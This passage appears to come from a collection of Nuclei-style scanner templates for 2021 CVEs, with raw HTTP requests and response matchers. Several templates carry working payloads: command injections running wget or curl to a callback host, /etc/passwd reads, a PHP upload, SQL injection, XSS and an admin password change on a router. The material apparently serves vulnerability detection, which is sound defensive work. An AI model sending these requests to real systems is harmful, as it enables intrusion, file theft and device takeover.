charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario=''&idsenha=a&tipousr=Usuario\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3, \"Os parametros n\u00e3o est\u00e3o informados corretamente\")","contains(body_3, \"O CNPJ dos parametro n\u00e3o est\u00e1 informado corretamente\")"],"condition":"or"},{"type":"dsl","dsl":["status_code_2 == 500 && status_code_3 == 200"]}]}]},{"id":"CVE-2021-36749","info":{"name":"Apache Druid - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","druid:*:1000:1000:"],"condition":"or"}]}]},{"id":"CVE-2021-25297","info":{"name":"Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["<b>Ping</b>","Switch Details"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-31755","info":{"name":"Tenda Router AC11 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/setmac HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/index.htmlr\nContent-Type: application/x-www-form-urlencoded\n\nmodule1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-3297","info":{"name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /status.htm HTTP/1.1\nHost: {{Hostname}}\nCookie: language=en; login=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Running Time","Firmware Version","Firmware Build Time"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3017","info":{"name":"Intelbras WIN 300/WRN 342 - Credentials Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword =","<title>Roteador Wireless</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["def_wirelesspassword = \"([A-Za-z0-9=]+)\";"],"part":"body"}]}]},{"id":"CVE-2021-42663","info":{"name":"Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</i><script>alert(document.domain)</script></div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27132","info":{"name":"Sercomm VD625 Smart Modems - CRLF Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Disposition: attachment;filename=test.txt","Set-Cookie:CRLFInjection=Test","Location: interact.sh","X-XSS-Protection:0"],"condition":"and"},{"type":"status","part":"header","status":[404]}]}]},{"id":"CVE-2021-39320","info":{"name":"WordPress Under Construction <1.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php/\"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/wp-admin/admin.php/\"><script>alert(document.domain)</script>","under-construction"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38704","info":{"name":"ClinicCases 7.3.3 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37573","info":{"name":"Tiny Java Web Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-30049","info":{"name":"SysAid Technologies 20.3.64 b14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20031","info":{"name":"SonicWall SonicOS 7.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{randstr}}.tld\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["https://{{randstr}}.tld/auth.html","Please be patient as you are being re-directed"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24389","info":{"name":"WordPress FoodBakery <2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24210","info":{"name":"WordPress PhastPress <1.111 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-44528","info":{"name":"Open Redirect in Host Authorization Middleware","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: //interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[301,302,307,308]}]}]},{"id":"CVE-2021-1497","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /auth/change HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n","POST /auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-21803","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36260","info":{"name":"Hikvision IP camera/NVR - Remote Command Execution","severity":"critical"},"requests":[{"raw":["PUT /SDK/webLanguage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><language>$(cat /etc/passwd>webLib/x)</language>\n","GET /x HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-21985","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\n"],"matchers":[{"type":"word","part":"body","words":["{\"result\":{\"isDisconnected\":"]}]}]},{"id":"CVE-2021-36380","info":{"name":"Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi/networkDiag.cgi HTTP/1.1\nHost: {{Hostname}}\n\ncommand=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-25298","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Connection Information","Host Check"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-31195","info":{"name":"Microsoft Exchange Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain)//&et=ServerError","mail/bootr.ashx"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24236","info":{"name":"WordPress Imagements <=1.2.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-comments-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"author\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"email\"\n\n{{randstr}}@email.com\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"url\"\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"checkbox\"\n\n\nyes\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"naam\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"image\"; filename=\"{{php}}\"\nContent-Type: image/jpeg\n\n<?php echo 'CVE-2021-24236'; ?>\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"submit\"\n\nPost Comment\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_post_ID\"\n\n{{post}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_parent\"\n\n0\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--\n","GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"word","part":"body_2","words":["CVE-2021-24236"]}]}]},{"id":"CVE-2021-24320","info":{"name":"WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24838","info":{"name":"WordPress AnyComment <0.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh","{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-24452","info":{"name":"WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'extensions/\\'-alert(document.domain)-\\'') && contains(body_2, 'w3-total-cache')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-24169","info":{"name":"WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"woo-order-export-lite\")"],"condition":"and"}]}]},{"id":"CVE-2021-38751","info":{"name":"ExponentCMS <= 2.6 - Host Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Host":"{{randstr}}.tld"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}.tld","EXPONENT.PATH","EXPONENT.URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29490","info":{"name":"Jellyfin 10.7.2 - Server Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/","{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2021-1498","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /storfs-asup HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27330","info":{"name":"Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/calendar/calendar_form.php/\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>TriConsole.com - PHP Calendar Date Picker</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44152","info":{"name":"Reprise License Manager 14.2 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/menu"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Administration Commands"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42258","info":{"name":"BillQuick Web Suite SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\n__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode(\"{{VS}}\")}}&__VIEWSTATEGENERATOR={{url_encode(\"{{VSG}}\")}}&__EVENTVALIDATION={{url_encode(\"{{EV}}\")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96\n"],"cookie-reuse":true,"matchers":[{"type":"word","part":"body","words":["System.Data.SqlClient.SqlException","Incorrect syntax near","_ACCOUNTLOCKED"],"condition":"and"}],"extractors":[{"type":"xpath","name":"VS","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATE']"],"attribute":"value"},{"type":"xpath","name":"VSG","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"],"attribute":"value"},{"type":"xpath","name":"EV","internal":true,"xpath":["/html/body/form/div/input[@id='__EVENTVALIDATION']"],"attribute":"value"}]}]},{"id":"CVE-2021-24956","info":{"name":"Blog2Social < 6.8.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&b2sShowByDate=\"><script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" name=","Your Activity"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40972","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[mail]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41291","info":{"name":"ECOA Building Automation System - Directory Traversal Content Disclosure","severity":"high"},"requests":[{"raw":["GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-21800","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>SSH Session </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37305","info":{"name":"Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username\":\"admin","success\":true","result\":{"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41192","info":{"name":"Redash Setup Configuration - Default Secrets Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs","{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Enter your new password:","redash"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24275","info":{"name":"Popup by Supsystic <1.10.5 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35587","info":{"name":"Oracle Access Manager - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/oam/server/opensso/sessionservice"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["x-oracle-dms-ecid","x-oracle-dms-rid"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"body","words":["/oam/pages/css/general.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22122","info":{"name":"FortiWeb - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//","{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('document.domain');//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert('document.domain')","No policy has been chosen."],"condition":"and"}]}]},{"id":"CVE-2021-44848","info":{"name":"Thinfinity VirtualUI User Enumeration","severity":"medium"},"requests":[{"raw":["GET /changePassword?username=administrator HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"rc\":(.*?)","\"msg\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21881","info":{"name":"Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic dXNlcjp1c2Vy\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46UEFTUw==\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-36748","info":{"name":"PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 404","contains(body_1, \"prestashop\")","contains(tolower(header_2), 'index.php?controller=404')","len(body_2) == 0"],"condition":"and"}]}]},{"id":"CVE-2021-20158","info":{"name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setConnectDevice","setInternet","setWlanSSID","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20137","info":{"name":"Gryphon Tower - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["onfocus=alert(document.domain) autofocus=1>","Send Access Request URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27561","info":{"name":"YeaLink DM 3.6.0.20 - Remote Command 